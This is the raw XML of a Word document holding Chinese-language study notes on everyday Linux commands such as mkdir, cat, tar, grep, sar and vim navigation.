        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D7858" w:rsidRPr="00CB0A92" w:rsidRDefault="001D7858" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="36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删除子文件和目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:-r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30DE4" w:rsidRPr="0022728A" w:rsidRDefault="00A65375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创建目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:mkdir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550773" w:rsidRPr="00CB0A92" w:rsidRDefault="00550773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同时创建多个目录和子目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550773" w:rsidRPr="00CB0A92" w:rsidRDefault="00550773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mkdir -p</w:t>
      </w:r>
      <w:r w:rsidR="00CE2738" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B630D0" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>aaa/bbb/ccc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2595" w:rsidRPr="0022728A" w:rsidRDefault="007621D1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删除目录</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:rmdir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757F88" w:rsidRPr="00CB0A92" w:rsidRDefault="00757F8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color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>只能删除空目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F33D70" w:rsidRPr="0022728A" w:rsidRDefault="00F33D70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查看文件或目录属性：</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B5358" w:rsidRPr="0022728A" w:rsidRDefault="009B5358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cat</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B5358" w:rsidRPr="00CB0A92" w:rsidRDefault="009B535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查看文件，并显示行号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B5358" w:rsidRPr="00CB0A92" w:rsidRDefault="009B535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lastRenderedPageBreak/>
        <w:t>cat -n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>所有行都行号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B5358" w:rsidRPr="00CB0A92" w:rsidRDefault="009B535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cat –b </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>仅文本行行号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4CC6" w:rsidRPr="0022728A" w:rsidRDefault="008A4CC6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tail</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>仅显示末行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4CC6" w:rsidRPr="00CB0A92" w:rsidRDefault="008A4CC6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tail –n 10 test.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487868" w:rsidRPr="0022728A" w:rsidRDefault="00487868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head</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>显示开头几行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487868" w:rsidRPr="00CB0A92" w:rsidRDefault="0048786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head -10 file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009010AC" w:rsidRPr="009B086F" w:rsidRDefault="009010AC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  <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B086F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="009B086F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tail</w:t>
      </w:r>
      <w:r w:rsidRPr="009B086F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不同的是，不需要</w:t>
      </w:r>
      <w:r w:rsidRPr="009B086F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r w:rsidRPr="009B086F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487868" w:rsidRPr="0022728A" w:rsidRDefault="00B22A5B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sort</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B22A5B" w:rsidRPr="00CB0A92" w:rsidRDefault="00B22A5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可以对文本内容进行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B22A5B" w:rsidRPr="00CB0A92" w:rsidRDefault="00B22A5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对数字排序</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sort –n file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03310" w:rsidRPr="0022728A" w:rsidRDefault="00F03310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grep</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE75D7" w:rsidRPr="00CB0A92" w:rsidRDefault="00DE75D7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ls | grep –e h –e o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
      <w:r w:rsidR="008755EE" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>名字</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21788" w:rsidRPr="0022728A" w:rsidRDefault="00F21788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解压缩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417EA5" w:rsidRPr="00BD785A" w:rsidRDefault="004A5C7E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color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD785A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00417EA5" w:rsidRPr="00BD785A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00294F83" w:rsidRPr="00CB0A92" w:rsidRDefault="00417EA5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gzip   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>压缩文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417EA5" w:rsidRPr="00CB0A92" w:rsidRDefault="00417EA5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gzcat  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看压缩包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417EA5" w:rsidRPr="00CB0A92" w:rsidRDefault="00417EA5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gunzip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解压文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417EA5" w:rsidRPr="00BD785A" w:rsidRDefault="004A5C7E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color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD785A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F54B6" w:rsidRPr="00CB0A92" w:rsidRDefault="00053022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tar –cvf xxx.tar </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003D4A11" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cc.sh</w:t>
      </w:r>
      <w:r w:rsidR="003D4A11" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D4A11" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>创建归档文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4A11" w:rsidRPr="00CB0A92" w:rsidRDefault="003D4A11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tar –tf xxx.tar </w:t>
      </w:r>
      <w:r w:rsidR="00C600E7" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看压缩文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4A11" w:rsidRPr="00CB0A92" w:rsidRDefault="003D4A11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lastRenderedPageBreak/>
        <w:t xml:space="preserve">tar –xvf xxx.tar </w:t>
      </w:r>
      <w:r w:rsidR="00C600E7" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解压缩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C600E7" w:rsidRPr="00CB0A92" w:rsidRDefault="00C600E7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 xml:space="preserve">tar –zxvf xxx.tgz  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A5C7E" w:rsidRPr="00BD785A" w:rsidRDefault="002F54B6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color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD785A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A5C7E" w:rsidRPr="00BD785A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537A93" w:rsidRDefault="00537A93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0716A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件比较</w:t>
      </w:r>
      <w:r w:rsidR="00EB1A46">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B67" w:rsidRPr="00B408C2" w:rsidRDefault="00EB4B67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color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B408C2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>格式要求比较高，前后中都要空格到位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537A93" w:rsidRDefault="00CA209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[ -d file ] file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在否，目录？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA209B" w:rsidRDefault="00CA209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[ -e file ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在否</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1A46" w:rsidRDefault="00CA209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[ -f file ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在否，文件否？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537A93" w:rsidRPr="0022728A" w:rsidRDefault="00537A93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 w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE2561" w:rsidRPr="00CB0A92" w:rsidRDefault="00BE256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局部环境变量都是小写字母</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE2561" w:rsidRPr="00CB0A92" w:rsidRDefault="00BE256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全局环境变量都是大写字母</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA4A74" w:rsidRPr="0022728A" w:rsidRDefault="00FA4A74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用户操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA4A74" w:rsidRPr="00CB0A92" w:rsidRDefault="00FA4A7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useradd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA4A74" w:rsidRPr="00CB0A92" w:rsidRDefault="00FA4A7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userdel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA4A74" w:rsidRPr="00CB0A92" w:rsidRDefault="00FA4A7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usermod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2595" w:rsidRPr="0022728A" w:rsidRDefault="008F2595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需要补充的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F2595" w:rsidRPr="00CB0A92" w:rsidRDefault="008F2595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查看文件号</w:t>
      </w:r>
      <w:r w:rsidR="00BD7274" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidR="007507A4" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007507A4" w:rsidRPr="00CB0A92" w:rsidRDefault="007507A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ls –R</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看所有子文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007648FF" w:rsidRPr="0022728A" w:rsidRDefault="00585DAF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shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585DAF" w:rsidRPr="00CB0A92" w:rsidRDefault="00585DAF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vim file_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585DAF" w:rsidRPr="00CB0A92" w:rsidRDefault="00585DAF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chmod u+x file_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585DAF" w:rsidRPr="00CB0A92" w:rsidRDefault="00585DAF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lastRenderedPageBreak/>
        <w:t>./file_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007648FF" w:rsidRPr="0022728A" w:rsidRDefault="005A353B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wc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A353B" w:rsidRPr="00CB0A92" w:rsidRDefault="005A353B" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="36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wc &lt; testShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A353B" w:rsidRPr="00CB0A92" w:rsidRDefault="005A353B" w:rsidP="002B35D0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="36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行数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D7E9F" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000270E6" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>词数</w:t>
      </w:r>
      <w:r w:rsidR="004D7E9F" w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字节数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007648FF" w:rsidRPr="0022728A" w:rsidRDefault="007648FF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sysstat</w:t>
      </w:r>
      <w:r w:rsidRPr="0022728A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>系统监控软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007648FF" w:rsidRPr="00CB0A92" w:rsidRDefault="007648FF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apt-cache show sysstat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007648FF" w:rsidRPr="00CB0A92" w:rsidRDefault="007648FF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启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:/etc/init.d/sysstat start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC057B" w:rsidRPr="00CB0A92" w:rsidRDefault="00DC057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宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网络状况：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sar -n DEV 1 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566A91" w:rsidRPr="0022728A" w:rsidRDefault="00566A91" w:rsidP="002B35D0">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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vim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566A91" w:rsidRPr="00CB0A92" w:rsidRDefault="00566A9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h</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：左移一个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566A91" w:rsidRPr="00CB0A92" w:rsidRDefault="00566A9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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0A92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="宋体" w:cs="Courier New"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：下移一行</w:t>
      </w:r>
    </w:p>
